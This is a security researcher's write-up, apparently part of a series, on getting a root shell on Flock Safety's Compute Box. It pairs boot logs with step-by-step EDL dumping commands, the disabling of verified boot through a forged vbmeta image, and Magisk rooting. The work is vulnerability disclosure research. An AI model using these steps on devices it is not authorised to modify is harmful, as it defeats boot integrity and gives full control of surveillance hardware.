(bootloader) partition-size:ssd: 0x2000
(bootloader) has-slot:modem:yes
(bootloader) has-slot:system:no
(bootloader) current-slot:a
(bootloader) has-slot:boot:yes
(bootloader) slot-retry-count:b:0
(bootloader) slot-unbootable:b:no
(bootloader) slot-successful:b:no
(bootloader) slot-retry-count:a:6
(bootloader) slot-unbootable:a:no
(bootloader) slot-successful:a:yes
(bootloader) slot-count:2
(bootloader) secure:no
(bootloader) serialno:REDACTED
(bootloader) product:lahaina
(bootloader) snapshot-update-status:none
(bootloader) is-userspace:no
(bootloader) max-download-size:805306368
(bootloader) kernel:uefi
all:
Finished. Total time: 0.010sBoot Logs:
Format: Log Type - Time(microsec) - Message - Optional Info
Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic
S - QC_IMAGE_VERSION_STRING=BOOT.MXF.1.0-00946.1-LAHAINA-1
S - IMAGE_VARIANT_STRING=SocKodiakLAA
S - OEM_IMAGE_VERSION_STRING=4c1b8341de57
S - Boot Interface: UFS
S - Secure Boot: Off
S - Boot Config @ 0xREDACTED = 0x000000c1
S - JTAG ID @ 0xREDACTED = 0xREDACTED
S - OEM ID @ 0xREDACTED = 0x00000000
S - Serial Number @ 0xREDACTED = 0xREDACTED
S - OEM Config Row 0 @ 0x007841c0 = 0x0000000000000000
S - OEM Config Row 1 @ 0x007841c8 = 0x0000000000000000
S - Feature Config Row 0 @ 0x00784148 = 0x0000000000000000
S - Feature Config Row 1 @ 0x00784150 = 0x0000000000000000
S - Core 0 Frequency, 1516 MHz
S - PBL Patch Ver: 1
D - 6618 - pbl_apps_init_timestamp
D - 39197 - bootable_media_detect_timestamp
D - 939 - bl_elf_metadata_loading_timestamp
D - 707 - bl_hash_seg_auth_timestamp
D - 6735 - bl_elf_loadable_segment_loading_timestamp
D - 4553 - bl_elf_segs_hash_verify_timestamp
D - 17259 - bl_sec_hash_seg_auth_timestamp
D - 823 - bl_sec_segs_hash_verify_timestamp
D - 29 - pbl_populate_shared_data_and_exit_timestamp
S - 76860 - PBL, End
B - 85705 - SBL1, Start
B - 214567 - SBL1 BUILD @ 00:35:09 on Oct 17 2024
B - 218593 - usb: usb_shared_hs_phy_init: hs phy cfg size , 0xc
B - 227774 - usb: eud_serial_upd , 0xREDACTED
D - 228109 - sbl1_hw_init
B - 329796 - UFS INQUIRY ID: SKhynix H9QT1G6DN6X132 A002
B - 331870 - UFS Boot LUN: 1
B - 343247 - UFS GEAR: 3
D - 116296 - boot_media_init
D - 31 - smss_load_cancel
B - 351726 - SMSS - Image Load, Start
D - 3050 - SMSS - Image Loaded, Delta - (0 Bytes)
D - 915 - Auth Metadata
D - 5551 - sbl1_xblconfig_init
B - 366488 - XBL Config - Image Load, Start
D - 0 - shrm_load_cancel
B - 374174 - SHRM - Image Load, Start
D - 518 - Auth Metadata
D - 1220 - Segments hash check
D - 11925 - SHRM - Image Loaded, Delta - (39616 Bytes)
D - 0 - boot_default_cdt_init
D - 183 - boot_cdt_init
B - 398330 - CDT - Image Load, Start
B - 401136 - CDT Version:3,Platform ID:34,Major ID:1,Minor ID:0,Subtype:1
D - 16561 - sbl1_hw_platform_pre_ddr
D - 0 - devcfg init
B - 427152 - PMIC A:2.0 B:1.0 C:2.2 I:1.0
B - 428891 - PM: Reset by PSHOLD
B - 431270 - PM: Reset Type: Shutdown
B - 434594 - PM: PON by SYSOK
B - 686524 - PM: SET_VAL:Skip
B - 686555 - PM: Verifying PON-Trigger specific configurations & current PON-Trigger
B - 695308 - PM: All PON-Trigger specific configs verified. Proceeding to BOOT
B - 704855 - PM: PSI: b0x06_v0x38
B - 708515 - PM: Device Init # SPMI Transn: 15330
D - 290848 - pm_device_init, Delta
B - 713364 - pm_driver_init, Start
B - 723948 - PM: enabling ldo-07 - 3V0_SENS
B - 724588 - PM: Driver Init # SPMI Transn: 510
D - 11438 - pm_driver_init, Delta
B - 732945 - PM: CHG Type in CHG init : 0
B - 737337 - PM: Battery ID: 100317Ohm
B - 740601 - PM: VBAT: 3822mV IBAT: 0mA dead_battery_threshold: 0mV
B - 750117 - PM: CHG Init # SPMI Transn: 15872
B - 750788 - vsense_init, Start
D - 0 - vsense_init, Delta
D - 350232 - sbl1_hw_pre_ddr_init
D - 0 - boot_dload_handle_forced_dload_timeout
D - 2958 - sbl1_load_ddr_training_data
B - 776347 - Pre_DDR_clock_init, Start
D - 61 - Pre_DDR_clock_init, Delta
D - 12901 - sbl1_ddr_set_params
B - 788059 - sbl1_ddr_init, Start
B - 791444 - LP4 DDR detected
D - 15189 - sbl1_ddr_init, Delta
B - 806572 - DSF version = 262.0.43
B - 809958 - Manufacturer ID = 6, Device Type = 7
B - 813526 - Rank 0 size = 4096 MB, Rank 1 size = 4096 MB
B - 818376 - Row Hamming DDR
B - 823896 - Row Hammer Check : DRAM supports unlimited MAC Value : MR_RH[OP2:0 = 0] & MR_RH[OP3 = 1] for CH0 & CS0
B - 832558 - Row Hammer Check : DRAM supports unlimited MAC Value : MR_RH[OP2:0 = 0] & MR_RH[OP3 = 1] for CH0 & CS1
B - 843264 - Row Hammer Check : DRAM supports unlimited MAC Value : MR_RH[OP2:0 = 0] & MR_RH[OP3 = 1] for CH1 & CS0
B - 854000 - Row Hammer Check : DRAM supports unlimited MAC Value : MR_RH[OP2:0 = 0] & MR_RH[OP3 = 1] for CH1 & CS1
D - 76769 - sbl1_ddr_init
D - 30 - boot_pre_ddi_entry
B - 872483 - do_ddr_training, Start
B - 913658 - DDR: Start of DDR Training Restore
B - 917196 - Current DDR Freq = 1709 MHz
B - 918324 - Max enabled DDR Freq = 2092 MHz
B - 922320 - DDR: End of DDR Training Restore
D - 51057 - do_ddr_training, Delta
D - 58956 - sbl1_do_ddr_training
D - 518 - boot_ddi_entry
B - 938149 - Pimem init cmd, entry
D - 9211 - Pimem init cmd, exit
B - 950593 - External heap init, Start
B - 953674 - External heap init, End
D - 22174 - sbl1_post_ddr_init
D - 31 - sbl1_hw_init_secondary
B - 964379 - DDR - Image Load, Start
B - 968070 - usb: UFS Serial - 0xREDACTED
B - 971760 - usb: chgr - SDP_CHARGER
B - 976091 - usb: usb_shared_hs_phy_init: hs phy cfg size , 0xc
D - 17232 - boot_fedl_check
B - 985485 - APDP - Image Load, Start
D - 884 - Auth Metadata
D - 488 - Segments hash check
D - 9608 - APDP - Image Loaded, Delta - (7844 Bytes)
D - 0 - boot_dload_dump_security_regions
D - 0 - ramdump_load_cancel
B - 1008208 - RamDump - Image Load, Start
D - 3324 - RamDump - Image Loaded, Delta - (0 Bytes)
D - 0 - boot_update_abnormal_reset_status
D - 0 - boot_cache_set_memory_barrier
D - 30 - boot_smem_debug_init
D - 457 - boot_smem_init
D - 0 - boot_smem_alloc_for_minidump
D - 61 - boot_smem_store_pon_status
D - 30 - sbl1_hw_platform_smem
D - 92 - boot_ddr_share_data_to_aop
D - 488 - boot_clock_init_rpm
D - 0 - boot_vsense_copy_to_smem
D - 31 - boot_populate_ram_partition_table
D - 0 - boot_populate_ddr_details_shared_table
D - 0 - sbl1_tlmm_init
D - 0 - sbl1_efs_handle_cookies
B - 1070977 - OEM_MISC - Image Load, Start
D - 519 - Auth Metadata
D - 214 - Segments hash check
D - 10644 - OEM_MISC - Image Loaded, Delta - (7736 Bytes)
B - 1084946 - QTI_MISC - Image Load, Start
D - 5703 - QTI_MISC - Image Loaded, Delta - (0 Bytes)
B - 1100348 - PM: PM Total Mem Allocated: 2340
D - 5521 - sbl1_pm_aop_pre_init_wrapper
B - 1104923 - AOP - Image Load, Start
D - 701 - Auth Metadata
D - 1647 - Segments hash check
D - 12902 - AOP - Image Loaded, Delta - (202484 Bytes)
B - 1121149 - QSEE Dev Config - Image Load, Start
D - 610 - Auth Metadata
D - 457 - Segments hash check
D - 13054 - QSEE Dev Config - Image Loaded, Delta - (44564 Bytes)
B - 1143231 - QSEE - Image Load, Start
D - 17995 - Auth Metadata
D - 21563 - Segments hash check
D - 83021 - QSEE - Image Loaded, Delta - (3587462 Bytes)
D - 61 - sbl1_hw_play_vibr
B - 1235158 - SEC - Image Load, Start
D - 3355 - SEC - Image Loaded, Delta - (64 Bytes)
B - 1242051 - CPUCPFW - Image Load, Start
D - 17263 - Auth Metadata
D - 17660 - Segments hash check
D - 47885 - CPUCPFW - Image Loaded, Delta - (171304 Bytes)
B - 1298964 - QHEE - Image Load, Start
D - 17294 - Auth Metadata
D - 9211 - Segments hash check
D - 30835 - QHEE - Image Loaded, Delta - (1921281 Bytes)
B - 1333094 - APPSBL - Image Load, Start
D - 671 - Auth Metadata
D - 11102 - Segments hash check
D - 23942 - APPSBL - Image Loaded, Delta - (2560000 Bytes)
D - 0 - sbl1_save_appsbl_index
B - 1366247 - SBL1, End
D - 1284050 - SBL1, Delta
S - Flash Throughput, 193413 KB/s (8703605 Bytes, 45869 us)
S - DDR Frequency, 1555 MHz
0 1.539615 Hypervisor cold boot, version: haven-33a3c04a prod (Mon Jun 6 22:23:22 2022 UTC)
[RM]Starting Resource Manager, version: e33467a (Mon Feb 21 02:38:28 2022 UTC)
[RM]init completed
[RM]UART is disabled
UEFI Start [ 1599]
- 0x09FC01000 [ 1602] Sec.efi
ASLR : ON
DEP : ON (RTB)
Timer Delta : +2 mS
RAM Entry 0 : Base 0x0080000000 Size 0x0039300000
RAM Entry 1 : Base 0x0180000000 Size 0x0100000000
RAM Entry 2 : Base 0x00C0000000 Size 0x00C0000000
Total Available RAM : 8083 MB (0x01F9300000)
Total Installed RAM : 8192 MB (0x0200000000)
Init 1 aux cores of 7
Init CPU core 1
> Scheduler up on Core 1
UEFI Ver : 6.0.241017.BOOT.MXF.1.0-00946.1-LAHAINA-1
Build Info : 64b Oct 17 2024 00:35:51
Boot Device : UFS
PROD Mode : TRUE
Retail : FALSE
PM0: 47, PM1: 63, PM2: 49, PM8: 46,
Module cannot re-initialize DAL module environment
UFS INQUIRY ID: SKhynix H9QT1G6DN6X132 A002
UFS Boot LUN: 1
HW Wdog Setting from PCD : Disabled
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
TCA6424A init start
TCA6424A read Failed 22
TCA6424A write Failed 22
TCA6424A write Failed 22
TCA6424A read Failed 22
TCA6424A write Failed 22
TCA6424A write Failed 22
DisplayDxe: Resolution 720x1280 (1 intf)
smem_alloc_ex: SMEM alloc_ex failed with err=-3! smem_type=478, remote=3, size=32, flags=0x40000000.UsbConfigLibOpenProtocols: PMI version (0x0)
UsbConfigLibOpenProtocols: gPmicNpaClientSS2 cannot be created
UsbConfigInit: after setting role
UsbConfigInit: after setting role
UsbConfigPortsQueryConnectionChange: usbport->connectstate: ATT
ButtonsDxeTest: Keypress SDAM data payload 0
SoftSKUDxeInitialize: SoftSKU not supported for this chip
tz_armv8_smc_call failed, TzStatus = 0xFFFFFFFE, SmcId = 0x32000101
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
QseeAppStartSyscall Failed 1
MinidumpTALib:LoadImageFromPartition(mdcompress) failed: 0xLoad Error
MinidumpTADxe: Minidump TA loading failed.
Disp init wait [ 2596]
-----------------------------
Platform Init [ 3258] BDS
UEFI Ver : 6.0.241017.BOOT.MXF.1.0-00946.1-LAHAINA-1
Platform : IDP
Subtype : 1
Boot Device : UFS
Chip Name : QCS6490
Chip Ver : 1.0
Chip Serial Number : 0xREDACTED
-----------------------------
UEFI Total : 1715 ms
POST Time [ 3314] OS Loader
Loader Build Info: Oct 17 2024 02:19:03
VB: Non-secure device: Security State: (0xFFF3F)
VB: RWDeviceState: Succeed using devinfo!
Flock HWID : 0x4
Total DDR Size: 0x00000001F9300000
Locate EFI_SOFTSKU_Protocol failed, Status = (0xE)
KeyPress:0, BootReason:0
Fastboot=0, Recovery:0
Booting from slot (_a)
Booting Into Mission Mode
Loading Image Start : 3332 ms
Loading Image Done : 3332 ms
Total Image Read size : 4096 Bytes
Load Image vbmeta_a total time: 1 ms
Load Image vbmeta_system_a total time: 1 ms
Load Image boot_a total time: 93 ms
Load Image dtbo_a total time: 24 ms
Load Image vendor_boot_a total time: 94 ms
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
VB2: Authenticate complete! boot state is: orange
VB2: boot state: orange(1)
QseeResponse->result = 0xFFFFFFFF
Status = 0x7
BootLinux: pcie switch flag is 0
BootLinux: using direct modem
Hyp version: 1
Memory Base Address: 0x80000000
Apply Overlay total time: 316 ms
tz_armv8_smc_call failed, TzStatus = 0xFFFFFFF8, SmcId = 0x2001901
ScmSipSysCall() failed, Status = (0x7)
VB: Non-secure device: Security State: (0xFFF3F)
VB: RWDeviceState: Succeed using devinfo!
Cmdline: console=ttyMSM0,115200n8 androidboot.hardware=qcom androidboot.console=ttyMSM0 androidboot.memcg=1 lpm_levels.sleep_disabled=1 video=vfb:640x400,bpp=32,memsize=3072000 msm_rtb.filter=0x237 servi0
RAM Partitions
Add Base: 0x0000000080000000 Available Length: 0x0000000039300000
Add Base: 0x0000000180000000 Available Length: 0x0000000100000000
Add Base: 0x00000000C0000000 Available Length: 0x00000000C0000000
PartialGoods Value: 0x0
Update Device Tree total time: 33 ms
Shutting Down UEFI Boot Services: 14240 ms
Start EBS [14240]
App Log Flush : 35 ms
ScmArmV8ExitBootServicesHandler, Status = 0x0.
Exit EBS [14292] UEFI End
0 14.305008 Hypervisor UART is disabled!With that said, let’s jump into getting a root shell on Flock Safety’s Compute Box. (EXCUSE THE DUST)
1. Connect USB-C code to the carrier boards USB-C port to get read only UART:
minicom -D /dev/ttyACM0 -b 115200
2. Put the device into EDL mode but holding down the button all the way on the right in this picture (labeled force USB)
3. Backup the entire UFS:
./edl rf /mnt/SECOND/Compute-Box-2-Partitions/full-ufs.bin --memory=ufs --loader=prog_firehose_ddr.elfIt >200 GB so it’ll take a WHILE, like 6-7 hours to read and 7-8 hours to write the entire UFS, so do your best to avoid soft bricking it. Trust me.
3a. Let’s backup the GPT as well:
./edl gpt /mnt/SECOND/Compute-Box-2-Partitions/ --genxml --loader=prog_firehose_ddr.mbn --memory=ufs3b. Now let’s backup each individual LUN:
./edl rf --lun=0 /mnt/SECOND/Compute-Box-2-Partitions/lun0_full.bin --memory=ufs --loader=prog_firehose_ddr.elf./edl rf --lun=1 /mnt/SECOND/Compute-Box-2-Partitions/lun1_full.bin --memory=ufs --loader=prog_firehose_ddr.elf./edl rf --lun=2 /mnt/SECOND/Compute-Box-2-Partitions/lun2_full.bin --memory=ufs --loader=prog_firehose_ddr.elf./edl rf --lun=3 /mnt/SECOND/Compute-Box-2-Partitions/lun3_full.bin --memory=ufs --loader=prog_firehose_ddr.elf./edl rf --lun=4 /mnt/SECOND/Compute-Box-2-Partitions/lun4_full.bin --memory=ufs --loader=prog_firehose_ddr.elf./edl rf --lun=5 /mnt/SECOND/Compute-Box-2-Partitions/lun5_full.bin --memory=ufs --loader=prog_firehose_ddr.elf4. Now lets grab the relevant partitions from within the LUNs just in case we need to flash ’em back quick:
./edl r vbmeta_system_a /mnt/SECOND/Compute-Box-2-Partitions/vbmeta_system_a.bin --memory=ufs --lun=0 --loader=prog_firehose_ddr.elf./edl r vbmeta_a /mnt/SECOND/Compute-Box-2-Partitions/vbmeta_a.bin --memory=ufs --lun=4 --loader=prog_firehose_ddr.elf./edl r boot_a /mnt/SECOND/Compute-Box-2-Partitions/boot_a.bin --memory=ufs --lun=4 --loader=prog_firehose_ddr.elf./edl r dtbo_a /mnt/SECOND/Compute-Box-2-Partitions/dtbo_a.bin --memory=ufs --lun=4 --loader=prog_firehose_ddr.elf./edl r vendor_boot_a /mnt/SECOND/Compute-Box-2-Partitions/vendor_boot_a.bin --memory=ufs --lun=4 --loader=prog_firehose_ddr.elfBackups on backups…nice.
Ok, so this device actually has AVB enabled so we need to null that out.
KeyPress:0, BootReason:0
Fastboot=0, Recovery:0
Booting from slot (_a)
Booting Into Mission Mode
Loading Image Start : 4270 ms
Loading Image Done : 4271 ms
Total Image Read size : 4096 Bytes
Load Image vbmeta_a total time: 0 ms --(Lun 4)
Load Image vbmeta_system_a total time: 0 ms -- (Lun 0)
Load Image boot_a total time: 98 ms -- (Lun 4)
Load Image dtbo_a total time: 24 ms -- (Lun 4)
Load Image vendor_boot_a total time: 102 ms -- (Lun 4)4. Generate a RSA 4096 key we’ll use with our new vbmeta_a partition:
openssl genrsa 4096 | openssl rsa -pubout -outform DER > dummy_key_4096.bin5. Lets create anew vbmeta_a image that still has the descriptors expected but with the ‘–flag 2’ arg set so it disables verification:
python3 avbtool.py make_vbmeta_image \
--output custom_vbmeta_a.img \
--include_descriptors_from_image boot_a.bin \
--include_descriptors_from_image vendor_boot_a.bin \
--include_descriptors_from_image dtbo_a.bin \
--chain_partition vbmeta_system:2:dummy_key_4096.bin \
--algorithm NONE \
--flags 26. Now lets generate an empty ‘vbmeta_system_a’ image:
dd if=/dev/zero of=null_vbmeta_system_a.img bs=4096 count=17. With the compute box still in EDL mode (or putting it back into EDL mode) lets write our new vbmeta_a and vbmeta_system_a images:
./edl w vbmeta_a /mnt/SECOND/Compute-Box-2-Partitions/custom_vbmeta_a.img --lun=4 --memory=ufs --loader=prog_firehose_ddr.elf./edl w vbmeta_system_a /mnt/SECOND/Compute-Box-2-Partitions/null_vbmeta_system_a.img --lun=0 --memory=ufs --loader=prog_firehose_ddr.elf8. Now lets exit EDL mode and confirm it still boots up all the way:
./edl reset --memory=ufs --loader=prog_firehose_ddr.elfYou should see within the boot logs:
Load Image vbmeta_a total time: 0 ms
avb_slot_verify.c:575: ERROR: vbmeta_a: Error verifying vbmeta image: OK_NOT_SIGNED
Load Image boot_a total time: 93 ms
Load Image dtbo_a total time: 24 ms
Load Image vendor_boot_a total time: 94 msAnd it’ll continue to boot into ‘mission’ mode and you should be able to ‘adb shell’ to get a restricted shell.
At this point I ended up exploring manual modifications to boot_a, vendor_boot_a, dtbo_a, super, system_a, system_ext_a, odm_a, vendor_a.. But I couldn’t get it to work completely. So I’ll save you the hassle. Use Magisk!
9. Install Magisk onto the computer box:
adb install Magisk-v29.0.apk10. Push the ‘boot_a’ image to the compute box:
adb push /mnt/SECOND/Compute-Box-2-Partitions/boot.img /sdcard/Download/boot_a.img11. Use ‘scrcpy’ to mirror the compute box:
./scrcpy12. Open Magisk, Select Install to File, Select the Download Directory and then the ‘boot_a.img’
13. Pull the patched boot image locally:
adb pull /sdcard/Downloads/magisk_patched-29000_stringfromoutput.img .14. Put the compute box back into EDL mode:
adb reboot edl15. Flash the patched boot image to the boot_a slot in Lun 4:
./edl w boot_a /mnt/SECOND/Compute-Box-2-Partitions/magisk_patched-29000_29000_stringfromoutput.img --lun=4 --memory=ufs --loader=prog_firehose_ddr.elf16. Boot ‘er up:
./edl reset --loader=prog_firehose_ddr.elf17. Use scrcpy to mirror the compute box:
./scrcpy18. Open magisk and confirm the bottom options aren’t grayed out anymore:
19. Open a new adb shell:
adb shell20. Switch user to root and when prompted in Magisk, hit “Grant Forever”. Alternatively, let it fail and then go into ‘Superuser’ after within Magisk and toggle it ‘Shell’ on.
su
21. Check who you are and set selinux to permissive:
If you want adbd to run as root, you can ‘adb root’ Magisk module:
Just note that you won’t be able to use scrcpy anymore if you do that.
View all my write-ups in regards to my Flock Safety Security Research:
Part 1: Bird Hunting Season – Security Research on Flock Safety’s Anti-Crime Systems: HERE
Part 2: Plucked and Rooted – Device 1: Debug Shell on Flock Safety’s Raven Gunshot Detection System: HERE
Part 3: Grounded Flight – Device 2: Root Shell on Flock Safety’s Falcon/Sparrow Automated License Plate Reader: HERE
Part 4: Trap Shooter – Flock Safety Sniffer & Alarm: HERE
Part 5: Root from the Coop – Device 3: Root Shell on Flock Safety’s Bravo Compute Box: HERE
Part 6: Fly-By – Device 2: The Falcon/Sparrow – Gated Wireless RCE, Camera Feed, DoS, Information Disclosure and More: HERE
Part 7: Button Presses to Wireless RCE: Shell on Flock Safety’s License Plate Cameras Over Wi-Fi: HERE
END TRANSMISSION